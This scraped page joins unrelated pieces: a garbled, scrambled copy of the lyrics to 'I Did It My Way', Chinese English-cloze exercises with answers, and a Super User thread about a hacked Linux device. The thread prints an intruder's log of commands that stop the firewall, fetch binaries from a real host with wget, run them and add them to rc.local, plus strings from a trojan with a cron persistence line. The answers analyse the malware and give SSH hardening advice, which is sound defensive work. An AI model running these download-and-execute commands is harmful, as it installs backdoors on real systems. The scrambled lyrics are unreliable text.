I Did It My Way 歌词_百度知道
I Did It My Way 歌词
提问者采纳
I did it my way1]I don&#39歌曲名, &#39;cause you know theyWill never understandIs plain to seeImage wise://music, be trueSo many things there are that I will doWhen I&#39;t wanna do the things you sayI don&#39, you&#39:The Blueprint 2 The Gift & The CurseLook at meDo you see all the thingsIt wanna play the game you playI just wanna be myselfAnd walk the road without pretendingI jusre telling meSure It wanna do the things you sayI don&#39.com/song/8522420" target="_blank">t wanna play the game you playI just wanna be myselfAnd walk the road without pretendingI jusre okayBut is there anythingInside of you?You&#39, it&#39, you to see:I don&#39, what is fake:1]I don&#39;t wanna do the things you sayI don&#39:I Did It My Way歌手: I did it my wayThere you are once again tellingMe how the things all should beAnd that I care far too much aboutMy art, be trueSo many things there are that I will doWhen I&#39;m looking back the roadAt least Is gonna tellMe what to doHear me say: I did it my way<a href="t wanna play the game you playI just wanna be myselfAnd walk the road without pretendingI just wanna live my life, I am real and I feelBut you can never stop?But you just act when you areBack against the wallWhat is true:Jay-Z 专辑?Everything that you makeOr you take?Hear me say, I cannot beWhat I&#39.baidu, be trueSo many things there are that I will doWhen I&#39, you forgot&#39.baidu://Cause no one&#39;m looking back the roadAt least Im looking back the roadAt least I can say
其他类似问题
为您推荐：
歌词的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁答案：解析：
1．dreamed　2．wonder　3．Actually　4．various　5．off　6．Emperor　7．whole　8．constrution　9．height　10．Sample
请在这里输入关键词：
科目：高中英语
来源：必修一导学英语外研版本 外研版
M：We had a(1)r_______ interesting debate in the science class today．
W：Really? What was it(2)a________?
M：Space exploration．Should we continue to(3)r________ or spend the money on what’s important to human beings? We had a heated discussion．
W：Well, I think it’s important to find out about the rest of the universe which is(4)u________ even for human beings．It is great and difficult work．
M：But are we wasting money that could be(5)s________ on medical research and saving lives? Medical research is very important．
W：I see what you are saying, but we need to(6)u________ the universe and how it works．I think much about it is(7)p________ to all of us．
M：But why? We live on the earth．As long as we know how earth works…
W：Let me ask you something．Wouldn’t you like to travel into space or(8)v________ the moon?
M：Oh, yes, it would be(9)w________!
W：Well, exactly．Maybe in the future it’ll be(10)p_______ to do that．
科目：高中英语
来源：必修一导学英语译林 译林版
M：We had a(1)r________ interesting debate in the science class today．
W：Really? What was it(2)a________?
M：Space exploration．Should we continue to(3)r________ or spend the money on what’s important to human beings? We had a heated discussion．
W：Well, I think it’s important to find out about the rest of the universe which
is(4)u________ even for human beings．It is great and difficult work．
M：But are we wasting money that could be(5)s________ on medical research and saving lives? Medical research is very important．
W：I see what you are saying, but we need to(6)u________ the universe and how it works．I think much about it is(7)p________ to all of us．
M：But why? We live on the earth．As long as we know how earth works…
W：Let me ask you something．Wouldn’t you like to travel into space or(8)v________ the moon?
M：Oh, yes, it would be(9)w________!
W：Well, exactly．Maybe in the future it’ll be(10)p________ to do that．
科目：高中英语
来源：选修导学英语译林7 译林版
M：Hello! How are you today? I heard you were not y　　1　　 last week．
W：I’m m　　2　　 better now thank you!
M：What was the matter? N　　3　　 serious I hope
W：Oh! No, I had a bad cold and had to stay in bed for two days．
M：I hope it was the last cold of winter and not the first cold of summer．What about your friend Ann? I heard she was ill too．
W：She was ill but now she’s all right．I think she c　　4　　 a cold．
M：Everybody seems to have one now．I guess it’s because of the sudden c　　5　　 of weather, one day hot and the next day cold．
W：And very windy too．That’s why I’m wearing a s　　6　　 today．What do you think of?
M：It certainly looks w　　7　　．It must have cost a lot．Where did you buy it?
W：Oh! I got it at a sale．It was quite cheap．
M：Really! Well, Mary, I must say it s　　8　　 you well．What a p　　9　　! I can’t get one for my wife．
W：Why not? Maybe I can help you find one for your wife some day．
M：Thanks a lot．I’m really thinking of s　　10　　 her a present．
科目：高中英语
M: Well, Stella? Why do you look (44)
u_________?
W: Oh, Bill, I have just had a quarrel
with Mr. Philips.
M: Mr. Philips! What on earth was it (45)
W: Well, I have made three bad (46)
m_____ so far this week. Today I (47) f_________ to give him an important
message, so he got really angry with me.
M: But I don’t understand. You are
usually very careful and (48) n_____ make mistakes.
W: I’m just so tired, I don’t know (49)
w______ I am doing.
M: Why? Have you been going to bed late
these days?
W: No, I’m usually in bed by about
eleven. But I keep being (50) w______ up by half past four every morning. And
then I cannot go back to sleep.
W: It’s my (51) n_____, the milkman next
door. He has to get up at half past four and he always turns the radio on
(52) l_____.
M: Ask him to turn it down then.
W: It’s difficult. I don’t know him yet.
M: If you don’t want to see him, write
him a letter.
W: Do you think it’s a good idea?
M: Yes, I do. I’ll help you (53) w______
the letter.
W: OK, let’s try.
(44) ________
(45) ________
(46) ________
(47) ________
(48) ________
(49) _______
(50) _______
(51) ________
(52) ________
(53) _______linux - Did I just get hacked? - Super User
to customize your list.
Super User is a question and answer site for computer enthusiasts and power users. It&#39;s 100% free, no registration required.
Here&#39;s how it works:
Anybody can ask a question
Anybody can answer
The best answers are voted up and rise to the top
I am developing a consumer product, and it is supposed to be connected to the Internet, so as expected, it is connected to the Internet so that I can properly develop it.
I went away for an hour or two, and when I came back to my office I noticed some strange commands written in the terminal.
Looking at the Linux log file called auth.log I can see the following lines (amongst many more):
1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): au logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162
1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]
The IP address 40.127.205.162 turns out to be .
Here are a bunch of commands that were used while I was away:
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
wget http://222.186.30.209:65534/yjz
chmod 0755 /tmp/yjz
nohup /tmp/yjz & /dev/null 2&&1 &
chmod 777 yjz
chmod 0755 /tmp/yjz
nohup /tmp/yjz & /dev/null 2&&1 &
chmod u+x yjz
chmod u+x yjz
/tmp/"&&/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod u+x yjz1
chmod 0777 yjz1
/tmp/"&&/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 & /dev/null 2&&1 &
chmod u+x yjz1
chmod 0777 yjz1
/root/"&&/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
echo "cd /root/"&&/etc/rc.local
echo "./yjz1&"&&/etc/rc.local
echo "./yjz1&"&&/etc/rc.local
echo "/etc/init.d/iptables stop"&&/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
echo "cd /root/"&&/etc/rc.local
echo "./yjz1&"&&/etc/rc.local
echo "./yjz1&"&&/etc/rc.local
echo "/etc/init.d/iptables stop"&&/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
echo "cd /root/"&&/etc/rc.local
echo "./yjz1&"&&/etc/rc.local
echo "./yjz1&"&&/etc/rc.local
echo "/etc/init.d/iptables stop"&&/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 & /dev/null 2&&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 & /dev/null 2&&1 &
chmod 777 yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 & /dev/null 2&&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
service iptables stop
wget http://175.102.133.55:2/yjz
./yd_cd/make
service iptables stop
service iptables stop
wget http://222.186.30.209:65534/yjz1
I was completely unaware of this. How can I secure my product properly?
I would like to post the complete auth.log file. How do I do that?
Also, the file yjz1 that was downloaded seems to be a Linux Trojan
and all of this seems to be done by some kind of hacker group according to
Should I call Microsoft and talk to them?
What should I do?
26.9k62957
We&#39;re looking for long answers that provide some explanation and context. Don&#39;t just give a one- explain why your answer is right, ideally with citations. Answers that don&#39;t include explanations may be removed.
there is one good reason why this post is attracting so much attention: you managed to record the whole, live session of an intruder on your PC. This is very different from our everyday experience, where we deal with the discovery of the consequences of his actions and try to redress them. Here we see him at work, see him having some problems with establishing the backdoor, retrace his steps, work feverishly (perhaps because he was sitting at your desk, as suggested above, or perhaps, and in my opinion more likely, because he was unable to make his malware run on the system, read below), and try to deploy fully self-contained instruments of control.
This is what security researchers witness daily with their honey traps. For me, this is a very rare chance, and the source of some amusement.
You have definitely been hacked. The evidence for this does not come from the snippet of the auth.log file you displayed, because this reports an unsuccessful login attempt, occurring over a short time span (two secs). You will notice that the second line states Failed password, while the third one reports a pre-auth disconnect: the guy tried and failed.
The evidence comes instead from the content of the two files
http://222.186.30.209:65534/yjz and http://222.186.30.209:65534/yjz1 which the attacker downloaded onto your system.
The site is currently open to anyone to download them, which I did. I first ran file on them, which showed:
ELF 32-bit LSB
executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
ELF 32-bit LSB
executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Then I brought them onto a 64-bit Debian VM I an examination of their content thru the strings command revealed much that was suspicious (reference to various well-known attacks, to commands to be substituted for, a script that was clearly used to set up a new service, and so on).
I then produced the MD5-hashes of both files, and fed them to
hash database to see whether they are known agents of malware. While yjz is not, yjz1 is, and Cymru reports a probability of detection by anti-virus software of 58%. It also states that this file was last seen some three days ago, so it is reasonably recent.
(part of the clamav package) on the two files I obtained:
$ clamscan y*
yjz: Linux.Backdoor.Gates FOUND
yjz1: Linux.Trojan.Xorddos FOUND
so we are now certain that standard Linux software can identify it.
What should you do?
Though rather new, neither system is very new, , for instance. So most free packages should be able to remove it. You should try: clamav, rkhunter, chkrootkit. I have Googled around, and seen that they claim to be able to spot it. Use them to check on the predecessor's work, but after running these three programs you should be ready to go.
As for the larger question, what should you do to prevent future infections, Journeyman's answer is a good first step. Just keep in mind that it is an ongoing struggle, one that all of us (including me!) may very well have lost without even knowing it.
At Viktor Toth's (indirect) prompt, I would like to add a few comments. It is certainly true that the intruder encountered some difficulties: he downloads two distinct hacking tools, changes their permissions several times, restarts them several times, and tries many times to disable the firewall. It is easy to guess what is happening: he expects his hacking tools to open a communication channel toward one of his infected pcs (see later), and, when he does not see this new channel spring up on his control GUI, fears his hacking tool is being blocked by the firewall, so he repeats the installation procedure. I agree with Viktor Toth that this particular stage of his operation does not seem to bring the expected fruits, but I would like to encourage you very strongly not to underestimate the extent of the damage inflicted on your pc.
I provide here a partial output of strings yjz1:
etc/init.d/%s
/etc/rc%d.d/S90%s
update-rc.d
/etc/cron.hourly/gcc4.sh
/etc/rc.d/rc%d.d/S90%s
/proc/%d/exe
/proc/self/exe
MYSQL_HISTFILE=/dev/null
# chkconfig:
# description: %s
### BEGIN INIT INFO
# Provides:
# Required-Start:
# Required-Stop:
# Default-Start:
# Default-Stop:
# Short-Description:
### END INIT INFO
case $1 in
sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' && /etc/crontab
etc/init.d/%s
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 ( MSIE 6.0; Windows NT 5.2; SV1;
TencentT .NET CLR 1.1.4322)
Connection: Keep-Alive
This provides evidence of tampering with the services (in /etc/init.d and in /etc/rc.d), with crontab, with the history file of mysql, and a couple of files in proc which are links to bash (which suggests a custom-made fraudulent version of your shell has been planted). Then the program generates an HTTP request (to a Chinese-speaking site,
Accept-Language: zh-cn
which gives substance to David Schwartz's comment above), which may create even more havoc. In the request, binaries (Content-Type: application/x-www-form-urlencoded) are to be downloaded to the attacked pc (GET) and uploaded to the controlling machine (POST). I could not establish what would be downloaded to the attacked pc, but, given the small size of both yjz and yjz1 (1.1MB and 600kB, repectively), I can venture to surmise that most of the files needed to cloak the rootkit, i.e. the altered versions of ls, netstat, ps, ifconfig,..., would be downloaded this way. And this would explain the attacker's feverish attempts to get this download going.
There is no certainty that the above exhausts all possibilities: we certainly lack part of the transcript (between lines 457 and 481) and we furthermore, especially worrisome are lines 495-497,
./yd_cd/make
which refer to a file we did not see downloaded, and which might be a compilation: if so, it means the attacker has (finally?) understood what the problem with his executables was, and is trying to fix it, in which case the attacked pc has gone for good. [In fact, the two versions of the malware which the attacker downloaded onto the hacked machine (and I onto my 64bit Debian VM) are for an unsuitable architecture, x86, while the name alone of the hacked-into pc gives away the fact that he was dealing with an arm architecture].
The reason why I wrote this edit is to urge you as strongly as possible either to comb your system with a professional instrument, or to re-install from scratch.
And, by the way, should this prove useful to anyone, this is the list of of the 331 IP addresses to which yjz tries to connect. This list is so large (and probably destined to become larger still) that I believe this is the reason for tampering with mysql. The list provided by the other backdoor is identical, which, I presume, is the reason for leaving such an important piece of information out in the open (I think the attacker did not wish to make the effort to store them in kernel format, so he put the whole list in a clear-text file, which is probably read-in by all of his backdoors, for whichever OS):
61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
202.175.3.8
202.112.144.30
61.233.9.9
61.233.9.61
124.207.160.110
202.97.7.6
202.97.7.17
202.106.0.20
202.106.46.151
202.106.195.68
202.106.196.115
202.106.196.212
202.106.196.228
202.106.196.230
202.106.196.232
202.106.196.237
202.112.112.10
211.136.17.107
211.136.28.231
211.136.28.234
211.136.28.237
211.147.6.3
219.141.136.10
219.141.140.10
219.141.148.37
219.141.148.39
219.239.26.42
221.130.32.100
221.130.32.103
221.130.32.106
221.130.32.109
221.130.33.52
221.130.33.60
221.176.3.70
221.176.3.73
221.176.3.76
221.176.3.79
221.176.3.83
221.176.3.85
221.176.4.6
221.176.4.9
221.176.4.12
221.176.4.15
221.176.4.18
221.176.4.21
58.22.96.66
218.104.128.106
202.101.98.55
211.138.145.194
211.138.151.161
211.138.156.66
218.85.152.99
218.85.157.99
222.47.29.93
202.101.107.85
119.233.255.228
222.47.62.142
122.72.33.240
211.98.121.27
218.203.160.194
221.7.34.10
61.235.70.98
113.111.211.22
202.96.128.68
202.96.128.86
202.96.128.166
210.21.3.140
210.21.4.130
211.95.193.97
211.98.2.4
211.98.4.1
211.162.61.225
211.162.61.235
211.162.61.255
211.162.62.1
211.162.62.60
221.4.66.66
202.103.176.22
202.96.144.47
210.38.192.33
202.96.134.33
202.96.134.133
202.96.154.15
210.21.196.6
221.5.88.88
202.103.243.112
202.193.64.33
61.235.164.13
61.235.164.18
202.103.225.68
221.7.136.68
202.103.224.68
211.97.64.129
211.138.240.100
211.138.242.18
211.138.245.180
221.7.128.68
222.52.118.162
202.98.192.67
202.98.198.167
211.92.136.81
211.139.1.3
211.139.2.18
202.100.192.68
211.97.96.65
211.138.164.6
221.11.132.2
202.100.199.8
202.99.160.68
202.99.166.4
202.99.168.8
222.222.222.222
202.102.224.68
202.102.227.68
222.85.85.85
222.88.88.88
210.42.241.1
202.196.64.1
112.100.100.100
202.97.224.68
219.235.127.1
61.236.93.33
211.93.24.129
211.137.241.34
219.147.198.230
202.103.0.68
202.103.0.117
202.103.24.68
202.103.44.150
202.114.0.242
202.114.240.6
211.161.158.11
211.161.159.3
218.104.111.114
218.104.111.122
218.106.127.114
218.106.127.122
221.232.129.30
59.51.78.210
61.234.254.5
202.103.96.112
219.72.225.253
222.243.129.81
222.246.129.80
211.142.210.98
211.142.210.100
220.168.208.3
220.168.208.6
220.170.64.68
218.76.192.100
61.187.98.3
61.187.98.6
202.98.0.68
211.93.64.129
211.141.16.99
202.98.5.68
219.149.194.55
211.138.200.69
202.102.3.141
202.102.3.144
58.240.57.33
112.4.0.55
114.114.114.114
114.114.115.115
202.102.24.34
218.2.135.1
221.6.4.66
221.131.143.69
202.102.8.141
222.45.0.110
61.177.7.1
218.104.32.106
211.103.13.101
221.228.255.1
61.147.37.1
222.45.1.40
58.241.208.46
202.102.9.141
202.102.7.90
202.101.224.68
202.101.226.68
211.141.90.68
211.137.32.178
202.96.69.38
211.140.197.58
219.149.6.99
202.96.86.18
101.47.189.10
101.47.189.18
118.29.249.50
118.29.249.54
202.96.64.68
202.96.75.68
202.118.1.29
202.118.1.53
219.148.204.66
202.99.224.8
202.99.224.67
211.90.72.65
211.138.91.1
218.203.101.3
202.100.96.68
211.93.0.81
222.75.152.129
211.138.75.123
202.102.154.3
202.102.152.3
219.146.1.66
219.147.1.66
202.102.128.68
202.102.134.68
211.138.106.19
211.90.80.65
202.99.192.66
202.99.192.68
61.134.1.4
202.117.96.5
202.117.96.10
218.30.19.40
218.30.19.50
116.228.111.118
180.168.255.18
202.96.209.5
202.96.209.133
202.101.6.2
211.95.1.97
211.95.72.1
211.136.112.50
211.136.150.66
124.161.97.234
124.161.97.238
124.161.97.242
61.139.2.69
202.98.96.68
202.115.32.36
202.115.32.39
218.6.200.139
218.89.0.124
61.139.54.66
61.139.39.73
139.175.10.20
139.175.55.244
139.175.150.20
139.175.252.16
168.95.1.1
210.200.211.193
210.200.211.225
211.78.130.1
61.31.233.1
168.95.192.1
168.95.192.174
61.60.224.3
61.60.224.5
202.113.16.10
202.113.16.11
202.99.96.68
202.99.104.68
211.137.160.5
211.137.160.185
219.150.32.132
202.98.224.68
211.139.73.34
61.10.0.130
61.10.1.130
202.14.67.4
202.14.67.14
202.45.84.58
202.45.84.67
202.60.252.8
202.85.128.32
203.80.96.9
203.142.100.18
203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33
211.92.144.161
222.221.5.240
61.166.25.129
202.96.103.36
221.12.1.227
221.130.252.200
222.46.120.5
202.96.96.68
218.108.248.219
218.108.248.245
61.130.254.34
60.191.244.5
202.96.104.15
202.96.104.26
221.12.33.227
202.96.107.27
61.128.128.68
61.128.192.68
218.201.17.2
221.5.203.86
221.5.203.90
221.5.203.98
221.7.92.86
221.7.92.98
The following code
#!/bin/bash
echo 0 & out
whois $i | grep -m 1 -i country && out
done & filename
cat out | grep -i cn | wc -l
on the above list shows that 302 out of a total 331 addresses are in mainland China, the remaining ones are in Hong Kong, Mongolia, Taiwan. This adds further support to David Schwartz's contention that this is mostly a Chinese bot ring.
At @vaid's request (the author of the OP, read his comment below), I will add a comment about how to strengthen security of a basic Linux system (for a system providing many services, this is a far more complex topic). vaid states he did the following:
Reinstall the system
changed root password to a 16 character long password with mixed lower- and uppercase letters and characters and digits.
Changed the username to a 6 mixed character long username and applied the same password as used for root
changed SSH port to something above 5000
turned off SSH root login.
This is fine (except I use a port above 10,000 since many useful programs use the ports below 10,000). But I cannot emphasize enough the need to use cryptographic keys for ssh login, instead of passwords. I will give you a personal example. On one of my VPSes, I was uncertain whether to I left it at 22, but used crypto keys for authentication. I had hundreds of break-in attempts per day, none succeeded. When, tired to check daily that no one had succeeded, I eventually switched the port to something above 10,000, break-in attempts went to zero. Mind you, it is not that hackers are stupid (they are not!), they just hunt down easier prey.
It is easy to activate a crypto key with RSA as a signature algorithm, see comment below by Jan Hudec (thanks!):
mkdir . chmod 700 . cd . ssh-keygen -t rsa (then hit &kbd&ENTER&/kbd& three times); cat id_rsa.pub && authorized_ chmod 600 *
Now all you have to do is to copy the file id_rsa to the machine from which you want to connect (in a directory .ssh, also chmod'ed to 700), then issue the command
ssh -p YourChosenNonStandardPort -i ~/.ssh/id_rsa me@RemoteMachine
When you are sure that this works, edit on the server (=the machine you want to connect to) the file /etc/ssh/sshd_config, and change the line
#PasswordAuthentication yes
PasswordAuthentication no
and restart the ssh service (service ssh restart or systemctl restart ssh, or something like this, depending on distro).
This will withstand a lot. In fact, there are currently no known exploits against the current versions of openssh v2, and of RSA as employed by openssh v2.
Lastly, in order to really bolt down your machine, you will need to configure the firewall (netfilter/iptables) as follows:
iptables -A INPUT -p tcp --dport YourChosenNonStandardPort -j ACCEPT
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
This, 1) allows ssh connections from both LAN and WAN, 2) allows all input which was originated by your requests (for instance, when you load a Web page), 3) drops everything else on the input, 4) allows everything on the output, and 5-6) allows everything on the loopback interface.
As your needs grow, and more ports need to be opened, you may do so by adding, at the top of the list, rules like:
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
to allow for instance people to access your Web browser.
26.9k62957
Welcome to the Internet - where any open SSH server is likely going to get probed, brute-forced, and have various indignities inflicted upon it.
To start, you need to completely wipe the storage on the product. Image it if you want to pass it on for forensics, but the Linux install on it is now suspect.
Bit of guesswork but
You got brute-forced or use a common password. It's security by obscurity but you don't want a dictionary password or to use a root account open to SSH. Disable root SSH access if it's an option or at least change the name so they need to guess both. SSHing as root is terrible security practice anyhow. If you must use root, log in as another user and use su or sudo to switch.
Depending on the product, you might want to lock down SSH access in some way. A total lock-down sounds like a good idea, and allows users to open it up as needed. Depending on what resources you can spare, consider only allowing IP addresses in your own subnet, or some kind of login throttling system. If you don't need it on the final product make sure it's turned off.
Use a non standard port. Security by obscurity again, but it means an attacker needs to target your port.
Do not ever use a default password. The best approach I've seen is to randomly generate a password for a specific device and ship it with your product.
Best practice is key based authentication, but I've no idea how you'd approach that on a mass market product.
87k27154273
Oh, you have been definitely hacked. Someone appears to have been able to gain root credentials and attempted to download a Trojan to your system. MariusMatutiae provided an analysis of the payload.
Two questions arise: a) Was the attacker successful? And b) what can you do about it?
The answer to the first question may be a no. Notice how the attacker repeatedly tries to download and run the payload, apparently without success. I suspect that something (SELinux, perchance?) stood in his way.
HOWEVER: The attacker also altered your /etc/rc.d/rc.local file, in the hope that when you restart your system, the payload will be activated. If you have not yet restarted the system, don't restart until you have removed these alterations from /etc/rc.d/rc.local. If you have already restarted it... well, tough luck.
As to what you can do about it: The safest thing to do is to wipe the system and reinstall from scratch. But this may not always be an option. A significantly less safe thing to do is to analyze exactly what happened and wipe every trace of it, if you can. Again, if you have not yet restarted the system, perhaps all it takes is clean /etc/rc.d/rc.local, remove anything downloaded by the attacker, and last but not least, change the darn password!
However, if the attacker was already able to run the payload, there may be other modifications to your system that may be difficult to detect. Which is why a complete wipe is really the only safe (and recommended) option. As you indicated, the equipment in question may be a test/development target so perhaps wiping it is not as painful as it may be in other cases.
Update: Notwithstanding what I wrote about a possible recovery, I wish to echo MariusMatutiae's very strong recommendation not to underestimate the potential damage caused by this payload and the extent to which it may have compromised the target system.
My sshd-honeypot has also seen this kind of attack. First Downloads from that URL started
10:25:33 and attacks are still ongoing.
Attacks are/were coming from
103.30.4.212
111.68.6.170
118.193.228.169
Input from these attackers was:
service iptables stop
wget http://222.186.30.209:65534/yjz1
nohup /root/yjz1 &gt /dev/null 2&gt&amp1 &amp
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
So no activities other than installing the backdoor for later on.
19.4k55570
debian-armhf is your host name ? or do you use a default install with default setting ? There is no problem with that, but not for host directly on internet (e.g. not protected by, at least, your modem).
it look like real trouble are comming from 222.186.30.209 ( see
), do not pay heed to microsoft's IP, IP can be fake more or less easily
usual way to connect to internet is to forward a know list of port from your public IP (say 8.8.8.8) to you local (192.168.1.12).
For instance, do not forward all incomming connection to 8.8.8.8 (public) to 192.168.1.12 (local).
Forward 25 and 22 (incomming mail and ssh) only, you would of course be up to date for ssh library and smtp library also.
what next ? disconnect host, change any password (in other computer of organisation) that are hard coded on shell script (shame on you !), on in /etc/shadow.
Everyone here has offered solid advice, but to be clear, your priorities should be backing up and verifying what you truly need from that system, then wiping it with a fresh install from known-safe media.
Before you connect your newly installed host to the Internet, run through these ideas:
Create a new non-root user, and log in as that user. You should never need to login as root, just sudo (substitute user do) when needed.
Install SE Linux, configuration settings that enable mandatory access control:
Consider a hardware firewall between your office/home and the Internet. I use MicroTik, which has excellent community support: .
Assuming you are on a timeline for completing your paid work, at least do #1. #3 is fast, and cheap, but you'll either need to wait on the package in the mail, or drive to the store.
As others stated, it's pretty clear the security of your server has been compromised. The safest thing is to wipe this machine and re-install.
To answer the second part of your question, if you can't use public key auth, I recommend at least setting up Fail2Ban and running SSH on a non-standard port. I also disable root SSH access.
will help mitigate brute-force attacks by banning IP addresses that fail to log in a certain number of times.
Setting sshd to listen on a non-standard port will at least help reduce the visibility of your SSH server a tiny bit. Disabling root logon also reduces the attack profile slightly. In /etc/sshd_config:
PermitRootLogin no
Port xxxxx
With root login disabled you will need to either switch to root with su once you've connected, or (more preferably) use
to execute privileged commands.
87k27154273
SSH servers are constantly under attack on the internet. A couple of things you do:
Make sure you use a very secure random password, for internet accessible machines. I mean like 16 characters or more and completely random. Use a password manager so you don't have to memorize it. If you can memorize your password, it's too simple.
If you don't need SSH, turn it off. If you do need it, but don't need it publicly accessible, run it on a high, non-standard port number. Doing this will dramatically reduce hack attempts. Yes a dedicated hacker can do a port scan, but automated bots won't find it.
The snippet from your auth log shows a failed attempt. However if you look further you'll no doubt see a successful login. It you use a simple password, then it's trivial for a bot to get in.
You need to isolate this machine from the network. Very carefully get what you need off it, and then wipe it.
26.9k62957
The first thing anyone/everyone should do after setting up a front-facing Linux/Unix server is to immediately disable root.
Your system was compromised. You have a running history log which might be cool to look at to an extent. But honestly dissecting the specifics is a bit nit-picky and won’t help you secure your server. It shows all kinds of nonsense that happens when botnet spawned malware—which is most likely what infected your server—infects a Linux system. The
is nice and well thought out and there are others who repeat that you were hacked via root access which is a malware/botnet’s wet dream.
There are a few explanation on how to disable root but I will state from personal experience, most anything that goes beyond what I will describe right now is overkill. This is what you should have done when you first setup the server:
Create a new user with sudo rights: Create a new user with a new name—something like cooldude—using a command like sudo adduser cooldude if you are using Ubuntu or another type of Debian system. Then just manually edit the sudo file using a command like this sudo nano /etc/sudoers and add a line like cooldude ALL=(ALL:ALL) ALL beneath the equivalent line that should read root ALL=(ALL:ALL) ALL. With that done, login as cooldude and test the sudo command with a command like sudo w—something basic and non-destructive—to see if the sudo rights work. You might be prompted for a password. That works? All good! Move onto the next step.
Lock the root account: Okay, now that cooldude is in charge with sudo rights, login as cooldude and run this command to lock the root account sudo passwd -l root. If somehow you have have created an SSH key pair for root, open up /root/.ssh/authorized_keys and remove the keys. Or better yet, just rename that file authorized_keys_OFF like this, sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFF to effectively disable the SSH keys. I prefer the later because on the off-hand chance you still need password less login, you can just move that file back to the original name and you should be good to go.
FWIW, I have managed dozens of Linux servers over the years (decades?) and know from experience that simply disabling root—and setting up a new user with sudo rights—is the simplest and most basic way to secure any Linux system. I’ve never had to deal with any type of compromise via SSH once root is disabled. And yes, you might see attempts to login via the auth.log but
if root is disabled then those attempts will never add up to anything. Just sit back and watch the attempts endlessly fail!
19.4k55570
protected by &#9830;
Thank you for your interest in this question.
Because it has attracted low-quality or spam answers that had to be removed, posting an answer now requires 10
on this site.
Would you like to answer one of these
Not the answer you&#39;re looking for?
Browse other questions tagged
Super User works best with JavaScript enabled}